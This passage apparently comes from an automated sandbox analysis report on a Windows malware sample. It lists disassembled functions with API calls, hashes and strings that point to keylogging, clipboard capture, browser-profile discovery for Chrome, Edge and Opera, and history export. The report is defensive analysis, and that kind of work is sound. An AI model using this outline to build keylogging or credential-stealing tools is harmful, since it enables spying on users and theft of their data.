                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1761009282-0
                                                                                                                                                    • Opcode ID: 37419d0d218480942dadea5656795116f0d18a982b1fc86bcd770d00ce79fbb1
                                                                                                                                                    • Instruction ID: 172d40622f1ab1578935e59e176b56ee8f32b46b57e8d95821f7f13fe34566be
                                                                                                                                                    • Opcode Fuzzy Hash: 37419d0d218480942dadea5656795116f0d18a982b1fc86bcd770d00ce79fbb1
                                                                                                                                                    • Instruction Fuzzy Hash: 97C04C1CB032C29D1C5066B0221469D034B2DA22C6BC456D5899097A038AC6300BD7FF
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 156C2C5D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • __startOneArgErrorHandling.LIBCMT ref: 156C2CED
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ErrorHandling__start
                                                                                                                                                    • String ID: pow
                                                                                                                                                    • API String ID: 3213639722-2276729525
                                                                                                                                                    • Opcode ID: 3b62390bc4a03d9ad9c7d2b38bb5b27421e4a6395afc46d79e28986b741703c1
                                                                                                                                                    • Instruction ID: 4e4ab6391e79ee7e72ea74f534f30b8979f9b023c25ab3aa265cef1c7d395c1f
                                                                                                                                                    • Opcode Fuzzy Hash: 3b62390bc4a03d9ad9c7d2b38bb5b27421e4a6395afc46d79e28986b741703c1
                                                                                                                                                    • Instruction Fuzzy Hash: 53517B75E1A28286C742EA14C94075A7BB4FB60760F204DDCE8DB839D9EF35A4D4CBC6
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 1568404C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 93sleepCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 15684066
                                                                                                                                                      • Part of subcall function 1569B978: GetCurrentProcessId.KERNEL32(00000000,?,?,?,?,?,?,1568407C), ref: 1569B99F
                                                                                                                                                      • Part of subcall function 15698568: CloseHandle.KERNEL32(156840F5,?,?,156840F5,156E5E74), ref: 1569857E
                                                                                                                                                      • Part of subcall function 15698568: CloseHandle.KERNEL32(156E5E74,?,?,156840F5,156E5E74), ref: 15698587
                                                                                                                                                      • Part of subcall function 1569C485: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,1568412F,156E5E74), ref: 1569C49E
                                                                                                                                                    • Sleep.KERNEL32(000000FA,156E5E74), ref: 15684138
                                                                                                                                                    Strings
                                                                                                                                                    • /sort "Visit Time" /stext ", xrefs: 156840B2
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CloseFileHandle$CreateCurrentModuleNameProcessSleep
                                                                                                                                                    • String ID: /sort "Visit Time" /stext "
                                                                                                                                                    • API String ID: 368326130-1573945896
                                                                                                                                                    • Opcode ID: def2b829b511890c755ceb2708a4c61bee0bfd1d46c9430267ecc8d1697ff284
                                                                                                                                                    • Instruction ID: 8abbcb74e45d4953ac95af9bbdde50f4c273af93c5d017fde7a1f40fe6f8dd05
                                                                                                                                                    • Opcode Fuzzy Hash: def2b829b511890c755ceb2708a4c61bee0bfd1d46c9430267ecc8d1697ff284
                                                                                                                                                    • Instruction Fuzzy Hash: 4D315275B123189BCB18EBB4DC949FEB7B9AF90205F400169E446A7290EF307D49CBD4
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 1568B748 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 156B4770: __onexit.LIBCMT ref: 156B4776
                                                                                                                                                    • __Init_thread_footer.LIBCMT ref: 1568B797
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Init_thread_footer__onexit
                                                                                                                                                    • String ID: [End of clipboard]$[Text copied to clipboard]
                                                                                                                                                    • API String ID: 1881088180-3686566968
                                                                                                                                                    • Opcode ID: 55e60f5cd2480dcb694c9dc137b81a7700947ee70740066a942f3ca84ef553e4
                                                                                                                                                    • Instruction ID: 8c42d142542294c0b68138cb238667416ce2f5e4c3ec8193ff2b93dd2355f79b
                                                                                                                                                    • Opcode Fuzzy Hash: 55e60f5cd2480dcb694c9dc137b81a7700947ee70740066a942f3ca84ef553e4
                                                                                                                                                    • Instruction Fuzzy Hash: 1121A139B163199BCB14EBB4DC90DEDB3BAAF50210F50052AD506A7294EF347D4ACBD8
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 02DE1C6C Relevance: 5.3, APIs: 4, Instructions: 330COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1428399500.0000000002DE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DE0000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1428298505.0000000002DE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1428558383.0000000002E0B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_2de0000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 5e8ae57d96511da5156c645123c57f52abec8c2fca4ba8135d71906e59f48c12
                                                                                                                                                    • Instruction ID: 70f0970a73d2884e15971ef25546795cbe819fed902ffe91c84bf5a2d0e178b0
                                                                                                                                                    • Opcode Fuzzy Hash: 5e8ae57d96511da5156c645123c57f52abec8c2fca4ba8135d71906e59f48c12
                                                                                                                                                    • Instruction Fuzzy Hash: C7A1D5A67106004BDB18BA7D9C843BDB3C2DBC4625F58427EE51ECB385EB78CD46C6A1
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 02DE94A8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 79threadCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetThreadLocale.KERNEL32(00000004,?,00000000,?,00000100,00000000,02DE9596), ref: 02DE952E
                                                                                                                                                    • GetDateFormatA.KERNEL32(00000000,00000004,?,00000000,?,00000100,00000000,02DE9596), ref: 02DE9534
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1428399500.0000000002DE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DE0000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1428298505.0000000002DE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1428558383.0000000002E0B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_2de0000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: DateFormatLocaleThread
                                                                                                                                                    • String ID: yyyy
                                                                                                                                                    • API String ID: 3303714858-3145165042
                                                                                                                                                    • Opcode ID: ea956a41e1dd4b400294b80a06609574658a321d061b8d73848bfcdd32d5f68c
                                                                                                                                                    • Instruction ID: a69308c7e2581c0e2dac5f8c3e41e2900ce0399c291c502572ccbb544959221e
                                                                                                                                                    • Opcode Fuzzy Hash: ea956a41e1dd4b400294b80a06609574658a321d061b8d73848bfcdd32d5f68c
                                                                                                                                                    • Instruction Fuzzy Hash: 63216071A026189BDF11EF64D851AEEB3B9EF48710F5100A5E906E7340E770DE44CBA1
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 15684FF4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67timeCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetLocalTime.KERNEL32(?,156F5598,?,00000000,?,?,?,?,?,?,15695CC9,?,00000001,0000004C,00000000), ref: 15685030
                                                                                                                                                      • Part of subcall function 1569B4EF: GetLocalTime.KERNEL32(00000000), ref: 1569B509
                                                                                                                                                    • GetLocalTime.KERNEL32(?,156F5598,?,00000000,?,?,?,?,?,?,15695CC9,?,00000001,0000004C,00000000), ref: 15685087
                                                                                                                                                    Strings
                                                                                                                                                    • KeepAlive | Enabled | Timeout: , xrefs: 1568501F
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: LocalTime
                                                                                                                                                    • String ID: KeepAlive | Enabled | Timeout:
                                                                                                                                                    • API String ID: 481472006-1507639952
                                                                                                                                                    • Opcode ID: 4d3b28cdb24f907132b35355fa24cc2e461d6812037e70a6f499a8afb5119131
                                                                                                                                                    • Instruction ID: 3bae327871b80224e9c5810eb805081f12511686a56a538231edcf676ac0f6ad
                                                                                                                                                    • Opcode Fuzzy Hash: 4d3b28cdb24f907132b35355fa24cc2e461d6812037e70a6f499a8afb5119131
                                                                                                                                                    • Instruction Fuzzy Hash: A7213565E293586BD700E730C8B473E7BACAB71214F40051ED88207268DF357A48CBE7
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 1568B051 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 48COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 1568B164: GetLocalTime.KERNEL32(?,Offline Keylogger Started,156F50F0), ref: 1568B172
                                                                                                                                                      • Part of subcall function 1568B164: wsprintfW.USER32 ref: 1568B1F3
                                                                                                                                                      • Part of subcall function 1569B4EF: GetLocalTime.KERNEL32(00000000), ref: 1569B509
                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 1568B0B4
                                                                                                                                                    • UnhookWindowsHookEx.USER32 ref: 1568B0C7
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: LocalTime$CloseHandleHookUnhookWindowswsprintf
                                                                                                                                                    • String ID: Online Keylogger Stopped
                                                                                                                                                    • API String ID: 1623830855-1496645233
                                                                                                                                                    • Opcode ID: f4fc06f4acfa0597e1ea9277dcb89eb38238dbd078f95aa59f1621de2f7c0d31
                                                                                                                                                    • Instruction ID: e3b1a3e72afc99eb3b159ef828a03faecdf3807f5d1cbf9a9d872b98185a6d7c
                                                                                                                                                    • Opcode Fuzzy Hash: f4fc06f4acfa0597e1ea9277dcb89eb38238dbd078f95aa59f1621de2f7c0d31
                                                                                                                                                    • Instruction Fuzzy Hash: F7017B38B093049BDB21BB34D80A7BE7BB5AF42110F80055DD983075E1EF613455DBDA
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 1568C526 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Microsoft\Edge\,00000000), ref: 1568C559
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ExistsFilePath
                                                                                                                                                    • String ID: UserProfile$\AppData\Local\Microsoft\Edge\
                                                                                                                                                    • API String ID: 1174141254-2800177040
                                                                                                                                                    • Opcode ID: 92da032cf4df95d0338de1ec97e96555ffc387af28ede9b2fdf748fce3f4aab5
                                                                                                                                                    • Instruction ID: ce970f5093bff56a312a8adea70b51fd263697ecf3beeab78d73002f2a2c8e44
                                                                                                                                                    • Opcode Fuzzy Hash: 92da032cf4df95d0338de1ec97e96555ffc387af28ede9b2fdf748fce3f4aab5
                                                                                                                                                    • Instruction Fuzzy Hash: 44F08C35F07319968B14E7B4EC458FF7B7CEE10112B400629A902A2188EF20B945C6FA
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 1568C589 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • PathFileExistsW.SHLWAPI(00000000,\Opera Software\Opera Stable\,00000000), ref: 1568C5BC
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ExistsFilePath
                                                                                                                                                    • String ID: AppData$\Opera Software\Opera Stable\
                                                                                                                                                    • API String ID: 1174141254-1629609700
                                                                                                                                                    • Opcode ID: 47c0de81b18b701a2dc038c16965f9197fdd073b8e9afd8e25ce24e747c9db10
                                                                                                                                                    • Instruction ID: 7256089106e276a00f161888fe95f096fa1936767efc1ca820490d47c21e6f5e
                                                                                                                                                    • Opcode Fuzzy Hash: 47c0de81b18b701a2dc038c16965f9197fdd073b8e9afd8e25ce24e747c9db10
                                                                                                                                                    • Instruction Fuzzy Hash: E7F08C35B0731996CB04E6B4DC458FF7B7CDD10211B400229AA02A2188EF20B945C6F6
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 1568C4C3 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Google\Chrome\,00000000), ref: 1568C4F6
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ExistsFilePath
                                                                                                                                                    • String ID: UserProfile$\AppData\Local\Google\Chrome\
                                                                                                                                                    • API String ID: 1174141254-4188645398
                                                                                                                                                    • Opcode ID: af7a335b435f3aadc1fc1745938741926b054eb034b2d5355caa7d1fd64c4c55
                                                                                                                                                    • Instruction ID: ab54f738767d98833ea55c61718f600f877d74a72eec63c80263754b9132ddca
                                                                                                                                                    • Opcode Fuzzy Hash: af7a335b435f3aadc1fc1745938741926b054eb034b2d5355caa7d1fd64c4c55
                                                                                                                                                    • Instruction Fuzzy Hash: 44F0A735B0731996CB04E7F8DC458FF7B7CDD10511B40011AA902A2189EF20BD05C7F6
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 1568B646 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 32keyboardCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetKeyState.USER32(00000011), ref: 1568B64B
                                                                                                                                                      • Part of subcall function 1568A3E0: GetForegroundWindow.USER32 ref: 1568A416
                                                                                                                                                      • Part of subcall function 1568A3E0: GetWindowThreadProcessId.USER32(00000000,?), ref: 1568A422
                                                                                                                                                      • Part of subcall function 1568A3E0: GetKeyboardLayout.USER32(00000000), ref: 1568A429
                                                                                                                                                      • Part of subcall function 1568A3E0: GetKeyState.USER32(00000010), ref: 1568A433
                                                                                                                                                      • Part of subcall function 1568A3E0: GetKeyboardState.USER32(?), ref: 1568A43E
                                                                                                                                                      • Part of subcall function 1568A3E0: ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 1568A461
                                                                                                                                                      • Part of subcall function 1568A3E0: ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 1568A4C1
                                                                                                                                                      • Part of subcall function 1568A636: SetEvent.KERNEL32(00000000,?,00000000,1568B20A,00000000), ref: 1568A662
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: State$KeyboardUnicodeWindow$EventForegroundLayoutProcessThread
                                                                                                                                                    • String ID: [AltL]$[AltR]
                                                                                                                                                    • API String ID: 2738857842-2658077756
                                                                                                                                                    • Opcode ID: e1735e2c801abd06c41986196fd5e1083ed01c34e5b8009d9c5312c7215a0056
                                                                                                                                                    • Instruction ID: 572ce15edbb089cad5f8a8659ec6dbaf5c9c53f8663aed225556b969c376ae55
                                                                                                                                                    • Opcode Fuzzy Hash: e1735e2c801abd06c41986196fd5e1083ed01c34e5b8009d9c5312c7215a0056
                                                                                                                                                    • Instruction Fuzzy Hash: 09E09235B06321538914733DA92ABBD2E519B42570B82024DE8C38BA98DD8A6DD5C3DA
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 1568B6A0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 24keyboardCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetKeyState.USER32(00000012), ref: 1568B6A5
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: State
                                                                                                                                                    • String ID: [CtrlL]$[CtrlR]
                                                                                                                                                    • API String ID: 1649606143-2446555240
                                                                                                                                                    • Opcode ID: ee0589e4c2d6a044d02ba7a2f3dbedfe0295f05553a59ccadb21c5a1fb4fd4c5
                                                                                                                                                    • Instruction ID: 338440c0484ee8648ba3a45660304a20ad5efe9800597c3e08d1e2b04e2f7515
                                                                                                                                                    • Opcode Fuzzy Hash: ee0589e4c2d6a044d02ba7a2f3dbedfe0295f05553a59ccadb21c5a1fb4fd4c5
                                                                                                                                                    • Instruction Fuzzy Hash: FCE08631B0231253C51476396E1977C2E11DB41560F41010DF8C38B999DD4659D0C3D6
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 02DE645C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 11memoryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1428399500.0000000002DE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DE0000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1428298505.0000000002DE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1428558383.0000000002E0B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_2de0000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AllocValue
                                                                                                                                                    • String ID: P,|
                                                                                                                                                    • API String ID: 1189806713-4085227803
                                                                                                                                                    • Opcode ID: 486ae16781d22705a780089aff3a3602ed21e109407355eaee04ee3af89afadf
                                                                                                                                                    • Instruction ID: 64d9a20dab71540f27b342c967c9893fbe7e4b164db003de5161f8e1f0a04654
                                                                                                                                                    • Opcode Fuzzy Hash: 486ae16781d22705a780089aff3a3602ed21e109407355eaee04ee3af89afadf
                                                                                                                                                    • Instruction Fuzzy Hash: EFC01260DC03804ADF01BBB6A04060D329DFB14304F4849257401C734ADB34D891CFB0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 156CF30A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 6COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CommandLine
                                                                                                                                                    • String ID: p&y
                                                                                                                                                    • API String ID: 3253501508-1102576638
                                                                                                                                                    • Opcode ID: d96ee7b491122d964c7afe4c37068d1a4eb8f627236e32ddc7b053f892eebbba
                                                                                                                                                    • Instruction ID: 73f3f546a311b841304e98eb27d6204785dfcdfef6e25f284d4732b552481ae4
                                                                                                                                                    • Opcode Fuzzy Hash: d96ee7b491122d964c7afe4c37068d1a4eb8f627236e32ddc7b053f892eebbba
                                                                                                                                                    • Instruction Fuzzy Hash: 31B09278C202788FC7108F3889BD0853BA9B308222380289FD852C2F00DF380106CFA0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 156C0C91 Relevance: 5.1, APIs: 4, Instructions: 139COMMONLIBRARYCODE
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,15681D55), ref: 156C0D27
                                                                                                                                                    • GetLastError.KERNEL32 ref: 156C0D35
                                                                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 156C0D90
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ByteCharMultiWide$ErrorLast
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1717984340-0
                                                                                                                                                    • Opcode ID: d9269779a007f60f2155adcac4eb4b6e58cba1e32a3f416ad37d12937d5f4d5f
                                                                                                                                                    • Instruction ID: a59b51f7d8f9349d78813ecb043f65b01ec4fb22e3829406f12aa855605b7a93
                                                                                                                                                    • Opcode Fuzzy Hash: d9269779a007f60f2155adcac4eb4b6e58cba1e32a3f416ad37d12937d5f4d5f
                                                                                                                                                    • Instruction Fuzzy Hash: C741C639A04256AFCB118F65C844BAE7BA9FF03730F1181E9EC55AB191DB70B901C7D0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 02DF9F9C Relevance: 5.1, APIs: 4, Instructions: 72COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • IsBadReadPtr.KERNEL32(?,00000004,?,00000004,?,00000008), ref: 02DF9FD0
                                                                                                                                                    • IsBadWritePtr.KERNEL32(?,00000004,?,00000004,?,00000004,?,00000008), ref: 02DFA000
